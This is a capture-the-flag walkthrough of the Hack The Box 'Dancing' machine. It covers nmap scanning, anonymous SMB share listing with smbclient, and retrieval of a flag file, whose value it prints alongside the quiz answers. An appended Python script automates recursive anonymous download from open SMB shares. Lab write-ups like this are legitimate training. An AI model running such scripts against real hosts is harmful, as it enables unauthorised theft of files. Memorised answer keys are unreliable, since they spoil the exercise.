Hackthebox Target Machine Dancing: Detailed Walkthrough


Target: Dancing

Difficulty: very easy

The author uses Kali Linux as the penetration-testing platform. On Kali, first establish the VPN connection to the Hackthebox site with openvpn:

# openvpn starting_point_XXXXX.ovpn

Then start (SPAWN) the Dancing instance on the Hackthebox site to obtain the target's IP address, as shown in the figure below:

 

Next come the questions on the Hackthebox site. Most of them do not involve scanning or exploitation at all; they test fairly basic knowledge:

Task 1: What does the 3-letter acronym SMB stand for?

Answer: Server Message Block

Task 2:What port does SMB use to operate at?

Approach: scan the target with nmap and read the port number off the result. SMB runs directly over TCP on port 445; port 139 also shows up in the scan because it carries SMB over the NetBIOS session service.

Answer: 445

Task 3: What network communication model does SMB use, architecturally speaking?

Answer: client-server model

Task 4: What is the service name for port 445 that came up in our nmap scan?

Approach: scan the target with nmap -sV and read the SERVICE column. Note that the IP address in the scan report below differs from the one in the command; the instance address changes each time it is spawned, so always use the IP your own spawn shows.

# nmap -sV 10.129.1.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 03:07 EDT
Nmap scan report for 10.129.204.213
Host is up (0.21s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.83 seconds

Answer: microsoft-ds (the trailing ? in the scan output means nmap could not confirm the service by fingerprint and fell back to the well-known name for port 445)

Task 5: What is the tool we use to connect to SMB shares from our Linux distribution?

Answer: smbclient (between Windows hosts a share is reached through Network Neighborhood or a UNC path; on Linux the smbclient command provides the equivalent, letting you browse a Windows share directory.)

Task 6: What is the `flag` or `switch` we can use with the SMB tool to `list` the contents of the share?

Answer: -L

Task 7: What is the name of the share we are able to access in the end?

Approach: list the shares with -L. When prompted for a password, just press Enter; an empty password (a null session) is enough here. Passing -N does the same without the prompt.

# smbclient -L 10.129.1.12
Enter WORKGROUP\root's password:  (empty password)

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk

Answer: WorkShares

 

Task 8: What is the command we can use within the SMB shell to download the files we find?

Approach:

Next use smbclient to open the target share (the host is obviously Windows). From the enumeration above we can connect to WorkShares directly. Two things to note: smbclient accepts the share as //host/share, and if you use the UNC form with backslashes instead, each backslash must be doubled on the shell command line (\\\\10.129.1.12\\WorkShares); share names are case-insensitive, so Workshares works too. The password is again empty. Once inside, run ls in each directory; the flag turns out to be in the James.P directory, and the get command downloads it to the local machine. Success~~~

 

# smbclient //10.129.1.12/Workshares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 04:22:01 2021
  ..                                  D        0  Mon Mar 29 04:22:01 2021
  Amy.J                               D        0  Mon Mar 29 05:08:24 2021
  James.P                             D        0  Thu Jun  3 04:38:03 2021
                5114111 blocks of size 4096. 1753923 blocks available
smb: \> cd James.P
smb: \James.P\> dir
  .                                   D        0  Thu Jun  3 04:38:03 2021
  ..                                  D        0  Thu Jun  3 04:38:03 2021
  flag.txt                            A       32  Mon Mar 29 05:26:57 2021
                5114111 blocks of size 4096. 1753923 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> quit

┌──(root💀kali)-[~]
└─# cat flag.txt
5f61c10dffbc77a704d76016a22f1664 
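The three steps above (nmap -sV, smbclient -L over a null session, then cd/ls/get inside the share) can be scripted. The following Python is an added example written for this walkthrough, not code from the original post or from Hackthebox: it parses the nmap and smbclient output formats shown above into structured data, keeps only the non-default disk shares worth trying anonymously, converts a UNC path into the //host/share form smbclient accepts, and builds the non-interactive smbclient command that recursively downloads a share. The sample outputs embedded in it are constructed from the transcript on this page; the function names, the -p 139,445 port selection in the live path and the recurse/mget download approach are the example's own choices, and the live path assumes nmap and smbclient are on PATH.

```python
"""Added example (not the walkthrough's own code): automate the Dancing chain
nmap -sV -> smbclient -L (null session) -> recursive download.
Assumes nmap and smbclient are on PATH when the live path is used."""
import re
import subprocess
from typing import Dict, List, Tuple

# Constructed sample: the port table from the walkthrough's `nmap -sV` run.
NMAP_SAMPLE = """\
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
"""

# Constructed sample: the share table from the walkthrough's `smbclient -L` run.
SMBCLIENT_L_SAMPLE = """\
\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tWorkShares      Disk
"""

_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
_SHARE_RE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer)(?:\s+(.*))?$")


def parse_nmap_ports(text: str) -> Dict[int, Tuple[str, str, str]]:
    """Map port -> (state, service, version) from nmap's normal output.
    A trailing '?' means nmap guessed the service from the port number
    instead of confirming it by fingerprint; it is stripped here."""
    ports: Dict[int, Tuple[str, str, str]] = {}
    for line in text.splitlines():
        m = _PORT_RE.match(line.strip())
        if m:
            port, _proto, state, service, version = m.groups()
            ports[int(port)] = (state, service.rstrip("?"), version or "")
    return ports


def smb_service_name(nmap_output: str) -> str:
    """Service name nmap reports on 445/tcp, or '' if that port is not open."""
    state, service, _ = parse_nmap_ports(nmap_output).get(445, ("closed", "", ""))
    return service if state == "open" else ""


def parse_shares(smbclient_l_output: str) -> List[Tuple[str, str, str]]:
    """Parse the (name, type, comment) rows printed by `smbclient -L`."""
    rows = []
    for line in smbclient_l_output.splitlines():
        m = _SHARE_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2), (m.group(3) or "").strip()))
    return rows


def candidate_shares(smbclient_l_output: str) -> List[str]:
    """Disk shares worth opening over a null session: hidden shares whose
    names end in '$' (ADMIN$, C$) need admin credentials and IPC$ holds no
    files, so only named disk shares such as WorkShares remain."""
    return [name for name, kind, _ in parse_shares(smbclient_l_output)
            if kind == "Disk" and not name.endswith("$")]


def unc_to_smbclient(unc_path: str) -> str:
    r"""Rewrite a Windows UNC path (\\host\share) into the //host/share form
    smbclient accepts, so no backslash has to be doubled for the shell."""
    return "//" + unc_path.strip("\\").replace("\\", "/")


def list_shares_cmd(host: str) -> List[str]:
    # -N sends an empty password without prompting (the walkthrough pressed Enter)
    return ["smbclient", "-L", host, "-N"]


def download_cmd(host: str, share: str) -> List[str]:
    """Non-interactive equivalent of the cd/ls/get session: walk every
    directory in the share and fetch all files into the current directory."""
    return ["smbclient", f"//{host}/{share}", "-N",
            "-c", "recurse ON; prompt OFF; mget *"]


def enumerate_and_loot(host: str) -> Dict[str, List[str]]:
    """Live path against a spawned instance; not exercised offline."""
    scan = subprocess.run(["nmap", "-sV", "-p", "139,445", host],
                          capture_output=True, text=True, check=True).stdout
    if not smb_service_name(scan):
        return {}
    listing = subprocess.run(list_shares_cmd(host),
                             capture_output=True, text=True).stdout
    fetched: Dict[str, List[str]] = {}
    for share in candidate_shares(listing):
        out = subprocess.run(download_cmd(host, share),
                             capture_output=True, text=True).stdout
        # smbclient prints "getting file \dir\name of size N as ..." per file
        fetched[share] = re.findall(r"getting file (\S+) of size", out)
    return fetched


if __name__ == "__main__":
    import sys
    for share, files in enumerate_and_loot(sys.argv[1]).items():
        print(share, files)
```

Run it as python3 dancing_enum.py 10.129.1.12 against a spawned instance; offline, the parsing functions can be exercised on the embedded samples. Any share that candidate_shares() returns and from which the download step actually fetches files is the finding worth reporting: a disk share readable without credentials.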
